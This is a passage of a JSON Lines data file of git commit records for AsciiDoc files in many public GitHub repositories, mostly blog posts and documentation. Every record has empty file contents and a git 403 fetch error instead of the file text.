rch,masterweb121\/elasticsearch,gmarz\/elasticsearch,lzo\/elasticsearch-1,mapr\/elasticsearch,ulkas\/elasticsearch,weipinghe\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,jbertouch\/elasticsearch,KimTaehee\/elasticsearch,mohit\/elasticsearch,xingguang2013\/elasticsearch,scottsom\/elasticsearch,lks2
1c\/elasticsearch,andrestc\/elasticsearch,davidvgalbraith\/elasticsearch,polyfractal\/elasticsearch,hafkensite\/elasticsearch,scottsom\/elasticsearch,elancom\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,elancom\/elasticsearch,jpountz\/elasticsearch,socialrank\/elasticsearch,Collaborne\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,andrejserafim\/elasticsearch,ESamir\/elasticsearch,MisterAndersen\/elasticsearch,kalburgimanjunath\/elasticsearch,YosuaMichael\/elasticsearch,jimczi\/elasticsearch,iacdingping\/elasticsearch,martinstuga\/elasticsearch,rmuir\/elasticsearch,jbertouch\/elasticsearch,nellicus\/elasticsearch,rajanm\/elasticsearch,adrianbk\/elasticsearch,jango2015\/elasticsearch,lmtwga\/elasticsearch,mbrukman\/elasticsearch,areek\/elasticsearch,rhoml\/elasticsearch,lmtwga\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,PhaedrusTheGreek\/elasticsearch,infusionsoft\/elasticsearch,jeteve\/elasticsearch,strapdata\/elassandra,diendt\/elasticsearch,sdauletau\/elasticsearch,socialrank\/elasticsearch,andrejserafim\/elasticsearch,kaneshin\/elasticsearch,andrejserafim\/elasticsearch,kalburgimanjunath\/elasticsearch,gfyoung\/elasticsearch,Rygbee\/elasticsearch,GlenRSmith\/elasticsearch,obourgain\/elasticsearch,jbertouch\/elasticsearch,bestwpw\/elasticsearch,MichaelLiZhou\/elasticsearch,LewayneNaidoo\/elasticsearch,mnylen\/elasticsearch,PhaedrusTheGreek\/elasticsearch,diendt\/elasticsearch,wuranbo\/elasticsearch,mgalushka\/elasticsearch,mgalushka\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,JervyShi\/elasticsearch,achow\/elasticsearch,wenpos\/elasticsearch,infusionsoft\/elasticsearch,drewr\/elasticsearch,alexshadow007\/elasticsearch,xingguang2013\/elasticsearch,zkidkid\/elasticsearch,caengcjd\/elasticsearch,kalimatas\/elasticsearch,socialrank\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,masterweb121\/elasticsearch,MisterAndersen\/elasticsearch,drewr\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,cnfire\/elasticsearch-1,Collaborne\/elasticsearch,markharwood\/elasticsearch,naveenhooda2000\/elasticsearch,liweinan0423\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,lzo\/elasticsearch-1,hafkensite\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra5-rc,AndreKR\/elasticsearch,scorpionvicky\/elasticsearch,knight1128\/elasticsearch,nknize\/elasticsearch,mmaracic\/elasticsearch,fforbeck\/elasticsearch,fernandozhu\/elasticsearch,onegambler\/elasticsearch,mmaracic\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,karthikjaps\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,tebriel\/elasticsearch,avikurapati\/elasticsearch,strapdata\/elassandra,xuzha\/elasticsearch,bawse\/elasticsearch,LewayneNaidoo\/elasticsearch,ricardocerq\/elasticsearch,coding0011\/elasticsearch,andrestc\/elasticsearch,ESamir\/elasticsearch,fernandozhu\/elasticsearch,mgalushka\/elasticsearch,davidvgalbraith\/elasticsearch,lmtwga\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,cnfire\/elasticsearch-1,winstonewert\/elasticsearch,YosuaMichael\/elasticsearch,markwalkom\/elasticsearch,drewr\/elasticsearch,AndreKR\/elasticsearch,MichaelLiZhou\/elasticsearch,jpountz\/elasticsearch,nazarewk\/elasticsearch,nrkkalyan\/elasticsearch,artnowo\/elasticsearch,kunallimaye\/elasticsearch,s1monw\/elasticsearch,polyfractal\/elasticsearch,elasticdog\/elasticsearch,palecur\/el
asticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,Charlesdong\/elasticsearch,GlenRSmith\/elasticsearch,diendt\/elasticsearch,andrestc\/elasticsearch,mortonsykes\/elasticsearch,KimTaehee\/elasticsearch,sreeramjayan\/elasticsearch,elancom\/elasticsearch,a2lin\/elasticsearch,cwurm\/elasticsearch,jbertouch\/elasticsearch,ouyangkongtong\/elasticsearch,xuzha\/elasticsearch,Charlesdong\/elasticsearch,mapr\/elasticsearch,JervyShi\/elasticsearch,franklanganke\/elasticsearch,xingguang2013\/elasticsearch,jchampion\/elasticsearch,MaineC\/elasticsearch,PhaedrusTheGreek\/elasticsearch,umeshdangat\/elasticsearch,kaneshin\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,GlenRSmith\/elasticsearch,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,bestwpw\/elasticsearch,ouyangkongtong\/elasticsearch,episerver\/elasticsearch,masaruh\/elasticsearch,socialrank\/elasticsearch,kaneshin\/elasticsearch,kaneshin\/elasticsearch,mcku\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,palecur\/elasticsearch,awislowski\/elasticsearch,mohit\/elasticsearch,nrkkalyan\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,trangvh\/elasticsearch,episerver\/elasticsearch,areek\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,uschindler\/elasticsearch,schonfeld\/elasticsearch,Stacey-Gammon\/elasticsearch,mcku\/elasticsearch,henakamaMSFT\/elasticsearch,lmtwga\/elasticsearch,rajanm\/elasticsearch,hafkensite\/elasticsearch,tebriel\/elasticsearch,nrkkalyan\/elasticsearch,huanzhong\/elasticsearch,jprante\/elasticsearch,JervyShi\/elasticsearch,dongjoon-hyun\/elasticsearch,JervyShi\/elasticsearch,jpountz\/elasticsearch,xuzha\/elasticsearch,jchampion\/elasticsearch,areek\/elasticsearch,petabytedata\/elasticsearch,Helen-Zhao\/elasticsearch,weipinghe\/elasticsearch,mcku\/elasticsearch,episerver\/elasticsearch,drewr\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,MichaelLiZhou\/elasticsearch,infusionsoft\/elasticsearch,martinstuga\/elasticsearch,wenpos\/elasticsearch,huanzhong\/elasticsearch,gingerwizard\/elasticsearch,cwurm\/elasticsearch,karthikjaps\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,caengcjd\/elasticsearch,nrkkalyan\/elasticsearch,mnylen\/elasticsearch,snikch\/elasticsearch,cnfire\/elasticsearch-1,jchampion\/elasticsearch,ulkas\/elasticsearch,AndreKR\/elasticsearch,F0lha\/elasticsearch,achow\/elasticsearch,jimczi\/elasticsearch,achow\/elasticsearch,tebriel\/elasticsearch,franklanganke\/elasticsearch,schonfeld\/elasticsearch,qwerty4030\/elasticsearch,ESamir\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,KimTaehee\/elasticsearch,AndreKR\/elasticsearch,petabytedata\/elasticsearch,karthikjaps\/elasticsearch,PhaedrusTheGreek\/elasticsearch,myelin\/elasticsearch,obourgain\/elasticsearch,dpursehouse\/elasticsearch,jchampion\/elasticsearch,StefanGor\/elasticsearch,andrejserafim\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,avikurapati\/elasticsearch,kunallimaye\/elasticsearch,davidvgalbraith\/elasticsearch,ouyangkongtong\/elasticsearch,jeteve\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,wittyameta\/elasticsearch,onegambler\/elasticsearch,jchampion\/elasticsearch,gfyoung\/elasticsearch,njlawton\/elasticsearch,huanzhong\/elasticsearch,jpountz\/elas
ticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ricardocerq\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,weipinghe\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,sdauletau\/elasticsearch,Collaborne\/elasticsearch,glefloch\/elasticsearch,mapr\/elasticsearch,maddin2016\/elasticsearch,girirajsharma\/elasticsearch,vroyer\/elasticassandra,areek\/elasticsearch,cnfire\/elasticsearch-1,sneivandt\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,adrianbk\/elasticsearch,ouyangkongtong\/elasticsearch,cwurm\/elasticsearch,rmuir\/elasticsearch,Charlesdong\/elasticsearch,nomoa\/elasticsearch,andrejserafim\/elasticsearch,wuranbo\/elasticsearch,rmuir\/elasticsearch,coding0011\/elasticsearch,dpursehouse\/elasticsearch,glefloch\/elasticsearch,andrejserafim\/elasticsearch,knight1128\/elasticsearch,jeteve\/elasticsearch,vietlq\/elasticsearch,kunallimaye\/elasticsearch,shreejay\/elasticsearch,fred84\/elasticsearch,petabytedata\/elasticsearch,s1monw\/elasticsearch,tebriel\/elasticsearch,mcku\/elasticsearch,wuranbo\/elasticsearch,caengcjd\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,mm0\/elasticsearch,qwerty4030\/elasticsearch,girirajsharma\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,ricardocerq\/elasticsearch,MetSystem\/elasticsearch,drewr\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,MichaelLiZhou\/elasticsearch,bawse\/elasticsearch,sdauletau\/elasticsearch,rhoml\/elasticsearch,markharwood\/elasticsearch,bawse\/elasticsearch,F0lha\/elasticsearch,nrkkalyan\/elasticsearch,palecur\/elasticsearch,lzo\/elasticsearch-1,YosuaMichael\/elasticsearch,mgalushka\/elasticsearch,jeteve\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,infusionsoft\/elasticsearch,polyfractal\/elasticsearch,jeteve\/elasticsearch,vietlq\/elasticsearch,clintongormley\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,clintongormley\/elasticsearch,camilojd\/elasticsearch,nomoa\/elasticsearch,ESamir\/elasticsearch,strapdata\/elassandra,zkidkid\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,xuzha\/elasticsearch,markharwood\/elasticsearch,MetSystem\/elasticsearch,mjason3\/elasticsearch,iacdingping\/elasticsearch,mm0\/elasticsearch,MetSystem\/elasticsearch,ivansun1010\/elasticsearch,jango2015\/elasticsearch,wittyameta\/elasticsearch,AndreKR\/elasticsearch,clintongormley\/elasticsearch,i-am-Nathan\/elasticsearch,palecur\/elasticsearch,martinstuga\/elasticsearch,wittyameta\/elasticsearch,nilabhsagar\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,markharwood\/elasticsearch,uschindler\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,mbrukman\/elasticsearch,masaruh\/elasticsearch,episerver\/elasticsearch,jprante\/elasticsearch,huanzhong\/elasticsearch,strapdata\/elassandra5-rc,spiegela\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,wbowling\/elasticsearch,pozhidaevak\/elasticsearch,hafkensite\/elasticsearch,nomoa\/elasticsearch,Collaborne\/elasticsearch,davidvgalbraith\/elasticsearch,zkidkid\/elasticsearch,mnylen\/elasticsearch,yynil\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,lzo\/elasticsearch-1,Collaborne\/elasticsearch,xuzha\/elasticsearch,robin13\/elasticsearch,adrianbk\/elasticsearch,kalburgimanjunath\/e
lasticsearch,mcku\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,avikurapati\/elasticsearch,huanzhong\/elasticsearch,Charlesdong\/elasticsearch,camilojd\/elasticsearch,wangtuo\/elasticsearch,jpountz\/elasticsearch,F0lha\/elasticsearch,kunallimaye\/elasticsearch,knight1128\/elasticsearch,wbowling\/elasticsearch,glefloch\/elasticsearch,yynil\/elasticsearch,YosuaMichael\/elasticsearch,lmtwga\/elasticsearch,mgalushka\/elasticsearch,ESamir\/elasticsearch,onegambler\/elasticsearch,rajanm\/elasticsearch,PhaedrusTheGreek\/elasticsearch,MetSystem\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,caengcjd\/elasticsearch,sreeramjayan\/elasticsearch,huanzhong\/elasticsearch,rmuir\/elasticsearch,mnylen\/elasticsearch,JSCooke\/elasticsearch,MisterAndersen\/elasticsearch,areek\/elasticsearch,naveenhooda2000\/elasticsearch,Rygbee\/elasticsearch,scorpionvicky\/elasticsearch,a2lin\/elasticsearch,onegambler\/elasticsearch,socialrank\/elasticsearch,scorpionvicky\/elasticsearch,iacdingping\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,petabytedata\/elasticsearch,awislowski\/elasticsearch,masterweb121\/elasticsearch,lmtwga\/elasticsearch,mcku\/elasticsearch,wbowling\/elasticsearch,i-am-Nathan\/elasticsearch,MaineC\/elasticsearch,palecur\/elasticsearch,trangvh\/elasticsearch,ulkas\/elasticsearch,F0lha\/elasticsearch,davidvgalbraith\/elasticsearch,knight1128\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,infusionsoft\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,hafkensite\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,schonfeld\/elasticsearch,jeteve\/elasticsearch,nellicus\/elasticsearch,Shepard1212\/elasticsearch,awislowski\/elasticsearch,masterweb121\/elasticsearch,strapdata\/elassandra5-rc,LeoYao\/elasticsearch,nellicus\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elassandra,C-Bish\/elasticsearch,gfyoung\/elasticsearch,rhoml\/elasticsearch,elasticdog\/elasticsearch,fred84\/elasticsearch,trangvh\/elasticsearch,ckclark\/elasticsearch,mbrukman\/elasticsearch,jbertouch\/elasticsearch,fred84\/elasticsearch,dpursehouse\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,YosuaMichael\/elasticsearch,wittyameta\/elasticsearch,andrestc\/elasticsearch,gmarz\/elasticsearch,alexshadow007\/elasticsearch,nellicus\/elasticsearch,maddin2016\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elassandra,markwalkom\/elasticsearch,mmaracic\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,jeteve\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,F0lha\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra5-rc,yynil\/elasticsearch,iacdingping\/elasticsearch,polyfractal\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,zkidkid\/elasticsearch,mapr\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,alexshadow007\/elasticsearch,girirajsharma\/elasticsearch,weipinghe\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalburgimanjunath\/elasticsearch,clintongormley\/elasticsearch,KimTaehee\/elasticsearch,weipinghe\/elasticsearch,Collaborne\/elasticsearch,nezirus\/elasticsearch,diendt\/elasticsearch,wangtuo\/elasticsearch,ia
cdingping\/elasticsearch,vroyer\/elassandra,nellicus\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,MichaelLiZhou\/elasticsearch,nrkkalyan\/elasticsearch,kunallimaye\/elasticsearch,mmaracic\/elasticsearch,wbowling\/elasticsearch,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,petabytedata\/elasticsearch,nazarewk\/elasticsearch,dongjoon-hyun\/elasticsearch,ouyangkongtong\/elasticsearch,markharwood\/elasticsearch,alexshadow007\/elasticsearch,robin13\/elasticsearch,jpountz\/elasticsearch,wbowling\/elasticsearch,mikemccand\/elasticsearch,kalburgimanjunath\/elasticsearch,geidies\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,infusionsoft\/elasticsearch,polyfractal\/elasticsearch,MichaelLiZhou\/elasticsearch,ricardocerq\/elasticsearch,Charlesdong\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrestc\/elasticsearch,adrianbk\/elasticsearch,fred84\/elasticsearch,Collaborne\/elasticsearch,MaineC\/elasticsearch,StefanGor\/elasticsearch,C-Bish\/elasticsearch,mnylen\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ckclark\/elasticsearch,karthikjaps\/elasticsearch,dongjoon-hyun\/elasticsearch,F0lha\/elasticsearch,brandonkearby\/elasticsearch,girirajsharma\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,lks21c\/elasticsearch,cwurm\/elasticsearch,xingguang2013\/elasticsearch,masterweb121\/elasticsearch,kaneshin\/elasticsearch,nknize\/elasticsearch,kunallimaye\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,bestwpw\/elasticsearch,mnylen\/elasticsearch,spiegela\/elasticsearch,xingguang2013\/elasticsearch,jango2015\/elasticsearch,ESamir\/elasticsearch,jango2015\/elasticsearch,dongjoon-hyun\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,xingguang2013\/elasticsearch,onegambler\/elasticsearch,ulkas\/elasticsearch,andrestc\/elasticsearch,rlugojr\/elasticsearch,mgalushka\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra5-rc,masaruh\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,martinstuga\/elasticsearch,ivansun1010\/elasticsearch,liweinan0423\/elasticsearch,mbrukman\/elasticsearch,mjason3\/elasticsearch,achow\/elasticsearch,diendt\/elasticsearch,camilojd\/elasticsearch,ulkas\/elasticsearch,elancom\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,snikch\/elasticsearch,HonzaKral\/elasticsearch,vietlq\/elasticsearch,bestwpw\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/plugins\/cloud-gce.asciidoc","new_file":"docs\/plugins\/cloud-gce.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b23b0ac7ec488646a942a641b3a54976117fcca6","subject":"Update 2016-07-30-Git-Lab-CI-Docker.adoc","message":"Update 2016-07-30-Git-Lab-CI-Docker.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-30-Git-Lab-CI-Docker.adoc","new_file":"_posts\/2016-07-30-Git-Lab-CI-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"da66a8c3a0d855775f8b74917183c85e7b992ce2","subject":"add mini contributor guide","message":"add mini contributor guide\n","repos":"opendevise\/bespoke-multimedia,opendevise\/bespoke-multimedia","old_file":"CONTRIBUTING-CODE.adoc","new_file":"CONTRIBUTING-CODE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opendevise\/bespoke-multimedia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c31946f6af2d2450422b34c6f2f55828d36d912","subject":"Added documentation for the new caching functionality","message":"Added documentation for the new caching functionality\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"575aa17d7e64f1eb54e0986953609df2f499ea91","subject":"added start idea for file\/blob","message":"added start idea for file\/blob\n","repos":"totonga\/wodson,totonga\/wodson,totonga\/wodson","old_file":"feasability_study\/doc\/file.adoc","new_file":"feasability_study\/doc\/file.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/totonga\/wodson.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f975c6164dc642bc8a7aa2c107695e7bd47bbdfc","subject":"To GF 5","message":"To GF 5\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"778bd390a5972a9248830a3af5f54ffa2fe3a141","subject":"chore(tooling-ci): \u6587\u6cd5\u7684\u306a\u4fee\u6b63","message":"chore(tooling-ci): 
\u6587\u6cd5\u7684\u306a\u4fee\u6b63\n","repos":"lidasong2014\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,azu\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,dieface\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,azu\/promises-book,cqricky\/promises-book,sunfurong\/promise,genie88\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,genie88\/promises-book,purepennons\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,azu\/promises-book,wenber\/promises-book,mzbac\/promises-book,wenber\/promises-book,liubin\/promises-book,azu\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,cqricky\/promises-book,purepennons\/promises-book,wenber\/promises-book,dieface\/promises-book","old_file":"Appendix-Note\/tooling-ci.adoc","new_file":"Appendix-Note\/tooling-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26e00820a96a12bd27af0752abf0621e3c602f5c","subject":"y2b create post Special Announcement - UnboxTherapy.com","message":"y2b create post Special Announcement - UnboxTherapy.com","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-21-Special-Announcement--UnboxTherapycom.adoc","new_file":"_posts\/2011-03-21-Special-Announcement--UnboxTherapycom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6641e546f761e243ea6acd6d00fe13a005bcb5","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33b4ed7e7ca45c76ef98603aa369ca77eb4f985d","subject":"y2b create post You've Never Seen A Keyboard Like This...","message":"y2b create post You've Never Seen A Keyboard Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-25-Youve-Never-Seen-A-Keyboard-Like-This.adoc","new_file":"_posts\/2017-10-25-Youve-Never-Seen-A-Keyboard-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87f267afcbf6d951606dcb9fb3a3afc14600d6c6","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97f8a5e4ca0e44128f0978340c99ccf8f1a8a9f0","subject":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","message":"Update 2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_file":"_posts\/2015-09-29-Versionering-van-Cobra-voor-Fun-en-Profit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4802a873d84a1beb09e1b9b411d7abdbe88ec8a4","subject":"Update 2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","message":"Update 2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","new_file":"_posts\/2016-08-09-Removing-and-Adding-Classes-on-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7850f378792f5be9eb10be71a669fc0b57ed640c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17f9a85dd4c1de19b807c9486e0be2788f3b446a","subject":"Update 2017-05-24-Your-Blog-title.adoc","message":"Update 2017-05-24-Your-Blog-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-24-Your-Blog-title.adoc","new_file":"_posts\/2017-05-24-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
